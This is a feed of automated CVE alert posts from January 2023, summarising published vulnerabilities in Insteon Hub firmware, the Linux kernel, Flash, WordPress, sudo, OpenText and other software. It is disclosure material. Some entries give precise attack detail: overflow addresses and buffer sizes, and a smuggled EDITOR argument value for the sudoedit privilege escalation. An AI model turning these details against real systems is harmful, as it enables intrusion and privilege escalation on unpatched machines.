🚨 CVE-2017-16307Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd sn_exw, at 0x9d01b310, the value for the `cmd1` key is copied using `strcpy` to the buffer at `$sp+0x2d0`.This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 22:30:05 |
🚨 CVE-2017-16288Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_time, at 0x9d018f60, the value for the `dst` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 22:30:04 |
🚨 CVE-2017-16287Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_time, at 0x9d018f00, the value for the `dstend` key is copied using `strcpy` to the buffer at `$sp+0x270`.This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 22:30:03 |
🚨 CVE-2017-16286Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_time, at 0x9d018ea0, the value for the `dststart` key is copied using `strcpy` to the buffer at `$sp+0x280`.This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 22:30:02 |
🚨 CVE-2017-16285Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_time, at 0x9d018e58, the value for the `offset` key is copied using `strcpy` to the buffer at `$sp+0x2d0`.This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 22:29:58 |
🚨 CVE-2017-16284Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_name, at 0x9d018958, the value for the `city` key is copied using `strcpy` to the buffer at `$sp+0x290`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 22:29:57 |
🚨 CVE-2017-16283Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_name, at 0x9d0188a8, the value for the `name` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 22:29:56 |
🚨 CVE-2021-46784In Squid 3.x through 3.5.28, 4.x through 4.17, and 5.x before 5.6, due to improper buffer management, a Denial of Service can occur when processing long Gopher server responses.🎖@cveNotify |
|
| 2023-01-19 22:29:55 |
🚨 CVE-2017-16279Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_net, at 0x9d0181a4, the value for the `port` key is copied using `strcpy` to the buffer at `$sp+0x280`.This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 22:29:54 |
🚨 CVE-2017-16282Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_net, at 0x9d01827c, the value for the `dhcp` key is copied using `strcpy` to the buffer at `$sp+0x270`.This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 22:29:50 |
🚨 CVE-2017-16278Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd s_net, at 0x9d01815c, the value for the `ip` key is copied using `strcpy` to the buffer at `$sp+0x2d0`.This buffer is 100 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 22:29:49 |
🚨 CVE-2017-16271Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd e_l, at 0x9d016c94, the value for the `as_c` key is copied using `strcpy` to the buffer at `$sp+0x2b0`.This buffer is 32 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 22:29:48 |
🚨 CVE-2017-16272Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd e_l, at 0x9d016cf0, the value for the `grp` key is copied using `strcpy` to the buffer at `$sp+0x1b4`.This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 22:29:47 |
🚨 CVE-2017-16273Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd e_ml, at 0x9d016fa8, the value for the `grp` key is copied using `strcpy` to the buffer at `$sp+0x1b4`.This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 22:29:46 |
🚨 CVE-2022-0863The WP SVG Icons WordPress plugin through 3.2.3 does not properly validate uploaded custom icon packs, allowing an high privileged user like an admin to upload a zip file containing malicious php code, leading to remote code execution.🎖@cveNotify |
|
| 2023-01-19 22:29:42 |
🚨 CVE-2017-16277Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd sn_grp, at 0x9d017658, the value for the `gcmd` key is copied using `strcpy` to the buffer at `$sp+0x270`.This buffer is 16 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 22:29:41 |
🚨 CVE-2021-38593Qt 5.x before 5.15.6 and 6.x through 6.1.2 has an out-of-bounds write in QOutlineMapper::convertPath (called from QRasterPaintEngine::fill and QPaintEngineEx::stroke).🎖@cveNotify |
|
| 2023-01-19 22:29:40 |
🚨 CVE-2006-3747Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.🎖@cveNotify |
|
| 2023-01-19 22:29:39 |
🚨 CVE-2019-9517Some HTTP/2 implementations are vulnerable to unconstrained interal data buffering, potentially leading to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint; however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the wire. The attacker then sends a stream of requests for a large response object. Depending on how the servers queue the responses, this can consume excess memory, CPU, or both.🎖@cveNotify |
|
| 2023-01-19 18:30:08 |
🚨 CVE-2015-8787The nf_nat_redirect_ipv4 function in net/netfilter/nf_nat_redirect.c in the Linux kernel before 4.4 allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by sending certain IPv4 packets to an incompletely configured interface, a related issue to CVE-2003-1604.🎖@cveNotify |
|
| 2023-01-19 18:30:07 |
🚨 CVE-2017-17853kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect BPF_RSH signed bounds calculations.🎖@cveNotify |
|
| 2023-01-19 18:30:06 |
🚨 CVE-2017-18017The tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c in the Linux kernel before 4.11, and 4.9.x before 4.9.36, allows remote attackers to cause a denial of service (use-after-free and memory corruption) or possibly have unspecified other impact by leveraging the presence of xt_TCPMSS in an iptables action.🎖@cveNotify |
|
| 2023-01-19 18:30:02 |
🚨 CVE-2006-7204The imap_body function in PHP before 4.4.4 does not implement safemode or open_basedir checks, which allows local users to read arbitrary files or list arbitrary directory contents.🎖@cveNotify |
|
| 2023-01-19 18:30:01 |
🚨 CVE-2014-2523net/netfilter/nf_conntrack_proto_dccp.c in the Linux kernel through 3.13.6 uses a DCCP header pointer incorrectly, which allows remote attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a DCCP packet that triggers a call to the (1) dccp_new, (2) dccp_packet, or (3) dccp_error function.🎖@cveNotify |
|
| 2023-01-19 18:30:00 |
🚨 CVE-2018-20961In the Linux kernel before 4.16.4, a double free vulnerability in the f_midi_set_alt function of drivers/usb/gadget/function/f_midi.c in the f_midi driver may allow attackers to cause a denial of service or possibly have unspecified other impact.🎖@cveNotify |
|
| 2023-01-19 18:29:56 |
🚨 CVE-2019-14901A heap overflow flaw was found in the Linux kernel, all versions 3.x.x and 4.x.x before 4.18.0, in Marvell WiFi chip driver. The vulnerability allows a remote attacker to cause a system crash, resulting in a denial of service, or execute arbitrary code. The highest threat with this vulnerability is with the availability of the system. If code execution occurs, the code will run with the permissions of root. This will affect both confidentiality and integrity of files on the system.🎖@cveNotify |
|
| 2023-01-19 18:29:55 |
🚨 CVE-2019-14896A heap-based buffer overflow vulnerability was found in the Linux kernel, version kernel-2.6.32, in Marvell WiFi chip driver. A remote attacker could cause a denial of service (system crash) or, possibly execute arbitrary code, when the lbs_ibss_join_existing function is called after a STA connects to an AP.🎖@cveNotify |
|
| 2023-01-19 18:29:54 |
🚨 CVE-2016-10150Use-after-free vulnerability in the kvm_ioctl_create_device function in virt/kvm/kvm_main.c in the Linux kernel before 4.8.13 allows host OS users to cause a denial of service (host OS crash) or possibly gain privileges via crafted ioctl calls on the /dev/kvm device.🎖@cveNotify |
|
| 2023-01-19 16:29:40 |
🚨 CVE-2022-4428support_uri parameter in the WARP client local settings file (mdm.xml) lacked proper validation which allowed for privilege escalation and launching an arbitrary executable on the local machine upon clicking on the "Send feedback" option. An attacker with access to the local file system could use a crafted XML config file pointing to a malicious file or set a local path to the executable using Cloudflare Zero Trust Dashboard (for Zero Trust enrolled clients).🎖@cveNotify |
|
| 2023-01-19 16:29:39 |
🚨 CVE-2022-34440Dell EMC SCG Policy Manager, versions from 5.10 to 5.12, contain(s) a contain a Hard-coded Cryptographic Key vulnerability. An attacker with the knowledge of the hard-coded sensitive information, could potentially exploit this vulnerability to login to the system to gain admin privileges.🎖@cveNotify |
|
| 2023-01-19 16:29:38 |
🚨 CVE-2021-37774An issue was discovered in function httpProcDataSrv in TL-WDR7660 2.0.30 that allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-01-19 13:29:51 |
🚨 CVE-2022-3738The vulnerability allows a remote unauthenticated attacker to download a backup file, if one exists. That backup file might contain sensitive information like credentials and cryptographic material. A valid user has to create a backup after the last reboot for this attack to be successfull.🎖@cveNotify |
|
| 2023-01-19 13:29:50 |
🚨 CVE-2023-23690Cloud Mobility for Dell EMC Storage, versions 1.3.0.X and below contains an Improper Check for Certificate Revocation vulnerability. A threat actor does not need any specific privileges to potentially exploit this vulnerability. An attacker could perform a man-in-the-middle attack and eavesdrop on encrypted communications from Cloud Mobility to Cloud Storage devices. Exploitation could lead to the compromise of secret and sensitive information, cloud storage connection downtime, and the integrity of the connection to the Cloud devices.🎖@cveNotify |
|
| 2023-01-19 12:30:04 |
🚨 CVE-2013-10014A vulnerability classified as critical has been found in oktora24 2moons. Affected is an unknown function. The manipulation leads to sql injection. The name of the patch is 1b09cf7672eb85b5b0c8a4de321f7a4ad87b09a7. It is recommended to apply a patch to fix this issue. VDB-218898 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-19 12:30:03 |
🚨 CVE-2014-125083A vulnerability has been found in Anant Labs google-enterprise-connector-dctm up to 3.2.3 and classified as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument username/domain leads to sql injection. The name of the patch is 6fba04f18ab7764002a1da308e7cd9712b501cb7. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218911.🎖@cveNotify |
|
| 2023-01-19 12:30:01 |
🚨 CVE-2015-10070A vulnerability was found in copperwall Twiddit. It has been rated as critical. This issue affects some unknown processing of the file index.php. The manipulation leads to sql injection. The name of the patch is 2203d4ce9810bdaccece5c48ff4888658a01acfc. It is recommended to apply a patch to fix this issue. The identifier VDB-218897 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-19 12:30:00 |
🚨 CVE-2015-10071A vulnerability was found in gitter-badger ezpublish-modern-legacy. It has been rated as problematic. This issue affects some unknown processing of the file kernel/user/forgotpassword.php. The manipulation leads to weak password recovery. Upgrading to version 1.0 is able to address this issue. The name of the patch is 5908d5ee65fec61ce0e321d586530461a210bf2a. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-218951.🎖@cveNotify |
|
| 2023-01-19 12:29:59 |
🚨 CVE-2023-22809In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value.🎖@cveNotify |
|
| 2023-01-19 12:29:58 |
🚨 CVE-2023-0398Cross-Site Request Forgery (CSRF) in GitHub repository modoboa/modoboa prior to 2.0.4.🎖@cveNotify |
|
| 2023-01-19 12:29:57 |
🚨 CVE-2015-10069A vulnerability was found in viakondratiuk cash-machine. It has been declared as critical. This vulnerability affects the function is_card_pin_at_session/update_failed_attempts of the file machine.py. The manipulation leads to sql injection. The name of the patch is 62a6e24efdfa195b70d7df140d8287fdc38eb66d. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218896.🎖@cveNotify |
|
| 2023-01-19 12:29:56 |
🚨 CVE-2017-20174A vulnerability was found in bastianallgeier Kirby Webmentions Plugin and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to injection. The attack may be launched remotely. The name of the patch is 55bedea78ae9af916a9a41497bd9996417851502. It is recommended to apply a patch to fix this issue. VDB-218894 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-19 12:29:55 |
🚨 CVE-2022-4892A vulnerability was found in MyCMS. It has been classified as problematic. This affects the function build_view of the file lib/gener/view.php of the component Visitors Module. The manipulation of the argument original/converted leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is d64fcba4882a50e21cdbec3eb4a080cb694d26ee. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218895.🎖@cveNotify |
|
| 2023-01-19 12:29:54 |
🚨 CVE-2023-0397A malicious / defect bluetooth controller can cause a Denial of Service due to unchecked input in le_read_buffer_size_complete.🎖@cveNotify |
|
| 2023-01-19 07:30:14 |
🚨 CVE-2022-27223In drivers/usb/gadget/udc/udc-xilinx.c in the Linux kernel before 5.16.12, the endpoint index is not validated and might be manipulated by the host for out-of-array access.🎖@cveNotify |
|
| 2023-01-19 07:30:13 |
🚨 CVE-2016-6927Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-4279, CVE-2016-6921, CVE-2016-6923, CVE-2016-6925, CVE-2016-6926, CVE-2016-6929, CVE-2016-6930, CVE-2016-6931, and CVE-2016-6932.🎖@cveNotify |
|
| 2023-01-19 07:30:12 |
🚨 CVE-2016-6926Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-4279, CVE-2016-6921, CVE-2016-6923, CVE-2016-6925, CVE-2016-6927, CVE-2016-6929, CVE-2016-6930, CVE-2016-6931, and CVE-2016-6932.🎖@cveNotify |
|
| 2023-01-19 07:30:11 |
🚨 CVE-2016-6925Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-4279, CVE-2016-6921, CVE-2016-6923, CVE-2016-6926, CVE-2016-6927, CVE-2016-6929, CVE-2016-6930, CVE-2016-6931, and CVE-2016-6932.🎖@cveNotify |
|
| 2023-01-19 07:30:08 |
🚨 CVE-2019-20042In wp-includes/formatting.php in WordPress 3.7 to 5.3.0, the function wp_targeted_link_rel() can be used in a particular way to result in a stored cross-site scripting (XSS) vulnerability. This has been patched in WordPress 5.3.1, along with all the previous WordPress versions from 3.7 to 5.3 via a minor release.🎖@cveNotify |
|
| 2023-01-19 07:30:07 |
🚨 CVE-2015-5290A Denial of Service vulnerability exists in ircd-ratbox 3.0.9 in the MONITOR Command Handler.🎖@cveNotify |
|
| 2023-01-19 07:30:06 |
🚨 CVE-2019-16781In WordPress before 5.3.1, authenticated users with lower privileges (like contributors) can inject JavaScript code in the block editor, which is executed within the dashboard. It can lead to an admin opening the affected post in the editor leading to XSS.🎖@cveNotify |
|
| 2023-01-19 07:30:05 |
🚨 CVE-2016-6923Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4272, CVE-2016-4279, CVE-2016-6921, CVE-2016-6925, CVE-2016-6926, CVE-2016-6927, CVE-2016-6929, CVE-2016-6930, CVE-2016-6931, and CVE-2016-6932.🎖@cveNotify |
|
| 2023-01-19 07:30:02 |
🚨 CVE-2016-4272Use-after-free vulnerability in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4279, CVE-2016-6921, CVE-2016-6923, CVE-2016-6925, CVE-2016-6926, CVE-2016-6927, CVE-2016-6929, CVE-2016-6930, CVE-2016-6931, and CVE-2016-6932.🎖@cveNotify |
|
| 2023-01-19 07:30:01 |
🚨 CVE-2021-39174Cachet is an open source status page system. Prior to version 2.5.1, authenticated users, regardless of their privileges (User or Admin), can leak the value of any configuration entry of the dotenv file, e.g. the application secret (`APP_KEY`) and various passwords (email, database, etc). This issue was addressed in version 2.5.1 by improving `UpdateConfigCommandHandler` and preventing the use of nested variables in the resulting dotenv configuration file. As a workaround, only allow trusted source IP addresses to access to the administration dashboard.🎖@cveNotify |
|
| 2023-01-19 07:30:00 |
🚨 CVE-2016-0991Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-0987, CVE-2016-0988, CVE-2016-0990, CVE-2016-0994, CVE-2016-0995, CVE-2016-0996, CVE-2016-0997, CVE-2016-0998, CVE-2016-0999, and CVE-2016-1000.🎖@cveNotify |
|
| 2023-01-19 07:29:59 |
🚨 CVE-2014-6417net/ceph/auth_x.c in Ceph, as used in the Linux kernel before 3.16.3, does not properly consider the possibility of kmalloc failure, which allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via a long unencrypted auth ticket.🎖@cveNotify |
|
| 2023-01-19 07:29:56 |
🚨 CVE-2013-0796The WebGL subsystem in Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbird before 17.0.5, Thunderbird ESR 17.x before 17.0.5, and SeaMonkey before 2.17 on Linux does not properly interact with Mesa drivers, which allows remote attackers to execute arbitrary code or cause a denial of service (free of unallocated memory) via unspecified vectors.🎖@cveNotify |
|
| 2023-01-19 07:29:55 |
🚨 CVE-2022-4457Due to a misconfiguration in the manifest file of the WARP client for Android, it was possible to a perform a task hijacking attack. An attacker could create a malicious mobile application which could hijack legitimate app and steal potentially sensitive information when installed on the victim's device.🎖@cveNotify |
|
| 2023-01-19 07:29:54 |
🚨 CVE-2018-25073A vulnerability has been found in Newcomer1989 TSN-Ranksystem up to 1.2.6 and classified as problematic. This vulnerability affects the function getlog of the file webinterface/bot.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.2.7 is able to address this issue. The name of the patch is b3a3cd8efe2cd3bd3c5b3b7abf2fe80dbee51b77. It is recommended to upgrade the affected component. VDB-218002 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-19 02:29:51 |
🚨 CVE-2017-16274Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authenticated HTTP request to trigger this vulnerability. In cmd e_u, at 0x9d017364, the value for the `grp` key is copied using `strcpy` to the buffer at `$sp+0x1b4`.This buffer is 8 bytes large, sending anything longer will cause a buffer overflow.🎖@cveNotify |
|
| 2023-01-19 02:29:50 |
🚨 CVE-2022-3085Fuji Electric Tellus Lite V-Simulator versions 4.0.12.0 and prior are vulnerable to a stack-based buffer overflow which may allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-01-19 02:29:49 |
🚨 CVE-2023-22809In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value.🎖@cveNotify |
|
| 2023-01-19 02:29:45 |
🚨 CVE-2021-43113iTextPDF in iText 7 and up to 7.1.17 allows command injection via a CompareTool filename that is mishandled on the gs (aka Ghostscript) command line in GhostscriptHelper.java.🎖@cveNotify |
|
| 2023-01-19 02:29:44 |
🚨 CVE-2010-10009A vulnerability was found in frioux ptome. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The name of the patch is 26829bba67858ca0bd4ce49ad50e7ce653914276. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218519.🎖@cveNotify |
|
| 2023-01-19 02:29:43 |
🚨 CVE-2022-45922An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The request handler for ll.KeepAliveSession sets a valid AdminPwd cookie even when the Web Admin password was not entered. This allows access to endpoints, which require a valid AdminPwd cookie, without knowing the password.🎖@cveNotify |
|
| 2023-01-19 02:29:40 |
🚨 CVE-2022-45924An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The endpoint itemtemplate.createtemplate2 allows a low-privilege user to delete arbitrary files on the server's local filesystem.🎖@cveNotify |
|
| 2023-01-19 02:29:39 |
🚨 CVE-2022-45926An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The endpoint notify.localizeEmailTemplate allows a low-privilege user to evaluate webreports.🎖@cveNotify |
|
| 2023-01-19 02:29:38 |
🚨 CVE-2022-45928A remote OScript execution issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). Multiple endpoints allow the user to pass the parameter htmlFile, which is included in the HTML output rendering pipeline of a request. Because the Content Server evaluates and executes Oscript code in HTML files, it is possible for an attacker to execute Oscript code. The Oscript scripting language allows the attacker (for example) to manipulate files on the filesystem, create new network connections, or execute OS commands.🎖@cveNotify |
|
| 2023-01-19 02:29:37 |
🚨 CVE-2023-0242Rapid7 Velociraptor allows users to be created with different privileges on the server. Administrators are generally allowed to run any command on the server including writing arbitrary files. However, lower privilege users are generally forbidden from writing or modifying files on the server. The VQL copy() function applies permission checks for reading files but does not check for permission to write files. This allows a low privilege user (usually, users with the Velociraptor "investigator" role) to overwrite files on the server, including Velociraptor configuration files. To exploit this vulnerability, the attacker must already have a Velociraptor user account at a low privilege level (at least "analyst") and be able to log into the GUI and create a notebook where they can run the VQL query invoking the copy() VQL function. Typically, most users deploy Velociraptor with limited access to a trusted group (most users will be administrators within the GUI). This vulnerability is associated with program files https://github.Com/Velocidex/velociraptor/blob/master/vql/filesystem/copy.go https://github.Com/Velocidex/velociraptor/blob/master/vql/filesystem/copy.go and program routines copy(). This issue affects Velociraptor versions before 0.6.7-5. Version 0.6.7-5, released January 16, 2023, fixes the issue.🎖@cveNotify |
|
| 2023-01-19 00:30:00 |
🚨 CVE-2022-43389A buffer overflow vulnerability in the library of the web server in Zyxel NR7101 firmware prior to V1.15(ACCC.3)C0, which could allow an unauthenticated attacker to execute some OS commands or to cause denial-of-service (DoS) conditions on a vulnerable device.🎖@cveNotify |
|
| 2023-01-19 00:29:59 |
🚨 CVE-2023-22945In the GrowthExperiments extension for MediaWiki through 1.39, the growthmanagementorlist API allows blocked users (blocked in ApiManageMentorList) to enroll as mentors or edit any of their mentorship-related properties.🎖@cveNotify |
|
| 2023-01-19 00:29:58 |
🚨 CVE-2023-21774Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773.🎖@cveNotify |
|
| 2023-01-19 00:29:56 |
🚨 CVE-2023-22952In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation.🎖@cveNotify |
|
| 2023-01-19 00:29:55 |
🚨 CVE-2021-26409Insufficient bounds checking in SEV-ES may allow an attacker to corrupt Reverse Map table (RMP) memory, potentially resulting in a loss of SNP (Secure Nested Paging) memory integrity.🎖@cveNotify |
|
| 2023-01-19 00:29:53 |
🚨 CVE-2021-46767Insufficient input validation in the ASP may allow an attacker with physical access, unauthorized write access to memory potentially leading to a loss of integrity or denial of service.🎖@cveNotify |
|
| 2023-01-19 00:29:52 |
🚨 CVE-2018-6557The MOTD update script in the base-files package in Ubuntu 18.04 LTS before 10.1ubuntu2.2, and Ubuntu 18.10 before 10.1ubuntu6 incorrectly handled temporary files. A local attacker could use this issue to cause a denial of service, or possibly escalate privileges if kernel symlink restrictions were disabled.🎖@cveNotify |
|
| 2023-01-19 00:29:51 |
🚨 CVE-2022-42012An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash by sending a message with attached file descriptors in an unexpected format.🎖@cveNotify |
|
| 2023-01-19 00:29:50 |
🚨 CVE-2022-42011An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash when receiving a message where an array length is inconsistent with the size of the element type.🎖@cveNotify |
|
| 2023-01-19 00:29:49 |
🚨 CVE-2022-42010An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash when receiving a message with certain invalid type signatures.🎖@cveNotify |
|
| 2023-01-19 00:29:48 |
🚨 CVE-2019-14494An issue was discovered in Poppler through 0.78.0. There is a divide-by-zero error in the function SplashOutputDev::tilingPatternFill at SplashOutputDev.cc.🎖@cveNotify |
|
| 2023-01-19 00:29:47 |
🚨 CVE-2007-6601The DBLink module in PostgreSQL 8.2 before 8.2.6, 8.1 before 8.1.11, 8.0 before 8.0.15, 7.4 before 7.4.19, and 7.3 before 7.3.21, when local trust or ident authentication is used, allows remote attackers to gain privileges via unspecified vectors. NOTE: this issue exists because of an incomplete fix for CVE-2007-3278.🎖@cveNotify |
|
| 2023-01-19 00:29:46 |
🚨 CVE-2023-21776Windows Kernel Information Disclosure Vulnerability.🎖@cveNotify |
|
| 2023-01-19 00:29:45 |
